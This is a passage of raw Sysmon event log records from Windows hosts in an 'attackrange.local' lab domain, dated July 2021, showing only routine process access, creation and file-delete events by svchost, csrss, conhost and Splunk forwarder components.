07:55:52.198{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050210Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.198{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050209Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.198{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050208Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.198{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F588-60EB-577D-00000000CF01}8408C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050207Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.183{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F588-60EB-577D-00000000CF01}8408C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050206Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.184{466BC892-F588-60EB-577D-00000000CF01}8408C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050205Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:52.100{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=310E2CC209F19E5A6998B145965C75FC,SHA256=068C2E637FC377025473410D36F4854DE74874F30DF17CF60BE3D6CA00E57159,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808210Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:53.225{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A26BD775EBB045CDE704FC79717B2D8A,SHA256=943A30062B48799EAD49B378AC25D9005993AE71D03DEEA68E435EC93D61F512,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050236Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:53.901{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8FE799F5F0FA6938F03DCDE28FDD86E0,SHA256=652644886369E3A45133D6E0ED17ABC3E660E2B910A1D99FF06949C15046D228,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050235Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:53.817{466BC892-F589-60EB-597D-00000000CF01}88209304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050234Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:53.601{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F589-60EB-597D-00000000CF01}8820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050233Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:53.601{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050232Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:53.601{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050231Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:53.601{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050230Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:53.601{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050229Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:53.601{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F589-60EB-597D-00000000CF01}8820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050228Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:53.586{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F589-60EB-597D-00000000CF01}8820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050227Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:53.587{466BC892-F589-60EB-597D-00000000CF01}8820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050226Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:53.102{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0551495651AF219D3AEFE85DFFC13A9,SHA256=35276B93059FC217A6E113C79CC287655F140E14BC4FF3DA62436A5589BDF133,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808211Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:54.259{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D195904756310A520FB184950C1D9FD,SHA256=3616F6431F50C71EC5447CD1EE4BA0DC8489CA094884A39F4DF9DF4298FC7D14,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050245Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:54.293{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F58A-60EB-5A7D-00000000CF01}8628C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050244Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:54.293{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F58A-60EB-5A7D-00000000CF01}8628C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050243Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:54.293{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050242Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:54.293{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050241Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:54.293{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050240Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:54.293{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050239Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:54.293{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F58A-60EB-5A7D-00000000CF01}8628C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050238Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:54.274{466BC892-F58A-60EB-5A7D-00000000CF01}8628C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050237Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:54.132{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C12A9DB2995F2B8371E0B2AC579409D2,SHA256=2ACDC6E8CD9B33FD05ADA97351B3C3CB2EE4F55FFCAACD8360704CEFA86524EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808212Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:55.274{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C54E8B1C9312CD7DB3C2B4DD94A8538,SHA256=6645395F67A150A6D51CB4119B251A7D16EE62EE8DD6EF7133BAE7A359E38C27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050247Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:55.288{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=68E2247CE5B249B5EAA84D766C3BEAF0,SHA256=B5357A68DB270DE7219B2D2AB521223F149BE2FA3AE6AE147DAC10D892F41DC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050246Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:55.138{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D04524FF4FA91B22B928A71AD73D726D,SHA256=119BD7692E90CFE516D93F017BBCC862C1C51BCD28FE4A3C1EE190A6788E6927,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808213Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:56.324{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 